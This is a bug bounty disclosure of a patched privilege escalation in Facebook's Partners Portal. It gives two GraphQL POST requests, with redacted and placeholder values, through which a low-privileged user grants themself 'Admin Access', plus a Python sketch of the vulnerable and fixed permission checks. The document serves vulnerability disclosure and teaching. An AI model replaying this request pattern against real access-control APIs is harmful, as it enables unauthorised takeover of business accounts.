Description
This bug could allow a malicious user with low permissions in a “Partners Portal” account to upgrade his access to full admin permissions. This could let him take full control of the account: deleting other admins, or gaining read/write capabilities to perform actions that may damage the enterprise, depending on the portal type (FBS, OPP or Mobile …).
Reproduction
1) Send a POST request to https://www.facebook.com/api/graphql/ with the cookies of a user who has limited access to a Partners Portal account, with these parameters in the body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=REDACTED&
variables={"id":"PARTNER_ID","partner_type":"PARTNER_TYPE"}
PARTNER_ID : targeted partner account id.
PARTNER_TYPE : targeted partner portal account type (e.g. fbs, xpp, opp)
This should return a list of permission groups. The attacker takes the id associated with the “Admin Access” group, which is a group with full permissions. We’ll refer to this permission group id as PERMISSION_GROUP.
2) Send a POST request to https://www.facebook.com/api/graphql/ with the cookies of the same user who has limited access to the Partners Portal account, with these parameters in the body:
__a=1&
fb_dtsg=CSRF_TOKEN&
doc_id=REDACTED&
variables={"existing_partner_ids":PARTNER_ID,"email":"ATTACKER_EMAIL","user_id":ATTACKER_USER_ID,"group_ids":PERMISSION_GROUP}
PARTNER_ID : Targeted partner account id.
ATTACKER_EMAIL : Email address associated with the attacker’s account in the portal.
ATTACKER_USER_ID : ID of the attacker’s Facebook account.
PERMISSION_GROUP : ID of the “Admin Access” permission group.
The response to this request would be (“update_user_permissions”: true). This request also works to change the permissions of other admin accounts, even if our account doesn’t have permission to update them.
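The root cause is a mutation that updates permission groups without checking what the caller is allowed to grant. The following is an added illustration of that missing server-side check, not Facebook’s code; the PartnerPortal model, the group and capability names, and the two handler functions are constructed for the example.

```python
from dataclasses import dataclass, field

# Constructed identifiers, not Facebook's: the "Admin Access" group and the
# capability that lets a member change other users' permission groups.
ADMIN_GROUP = "admin_access"
MANAGE_USERS = "manage_users"

@dataclass
class PartnerPortal:
    groups: dict                                     # group_id -> set of capabilities
    memberships: dict = field(default_factory=dict)  # user_id -> set of group_ids

    def capabilities(self, user_id):
        caps = set()
        for gid in self.memberships.get(user_id, ()):
            caps |= self.groups.get(gid, set())
        return caps

def update_user_permissions_vulnerable(portal, caller_id, target_user_id, group_ids):
    # Only checks that the caller belongs to the portal at all, so any low-
    # privileged member can assign any group to any user, including themselves.
    if caller_id not in portal.memberships:
        return False
    portal.memberships[target_user_id] = set(group_ids)
    return True

def update_user_permissions_fixed(portal, caller_id, target_user_id, group_ids):
    caller_caps = portal.capabilities(caller_id)
    # 1. The caller must hold the user-management capability in this partner account.
    if MANAGE_USERS not in caller_caps:
        return False
    # 2. The caller may only grant groups whose capabilities they already hold,
    #    so nobody can hand out (or take over) more access than they have.
    if any(gid not in portal.groups or not portal.groups[gid] <= caller_caps for gid in group_ids):
        return False
    portal.memberships[target_user_id] = set(group_ids)
    return True

def demo():
    def fresh():  # constructed portal: one admin, one low-privileged viewer
        return PartnerPortal({ADMIN_GROUP: {MANAGE_USERS, "read", "write"}, "viewer": {"read"}},
                             {"admin-1": {ADMIN_GROUP}, "low-1": {"viewer"}})
    vuln, fixed = fresh(), fresh()
    return {
        # step 2 of the report: the low-privileged user assigns itself Admin Access
        "vuln_self_escalation": update_user_permissions_vulnerable(vuln, "low-1", "low-1", [ADMIN_GROUP]),
        "fixed_self_escalation": update_user_permissions_fixed(fixed, "low-1", "low-1", [ADMIN_GROUP]),
        "fixed_demote_admin": update_user_permissions_fixed(fixed, "low-1", "admin-1", ["viewer"]),
        "fixed_admin_grant": update_user_permissions_fixed(fixed, "admin-1", "new-user", ["viewer"]),
        "low_caps_after": sorted(fixed.capabilities("low-1")),
    }
```

The fixed handler rejects both the self-escalation and the attempt to strip an existing admin, while a genuine admin can still add a viewer.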
Impact
A low-privileged Partner Portal account user can escalate their privileges to the highest/admin level.
Timeline
Feb 5, 2020 — Report Sent
Feb 7, 2020 — Acknowledged by Facebook
Feb 24, 2020 — Fixed by Facebook
Feb 26, 2020 — Bounty awarded by Facebook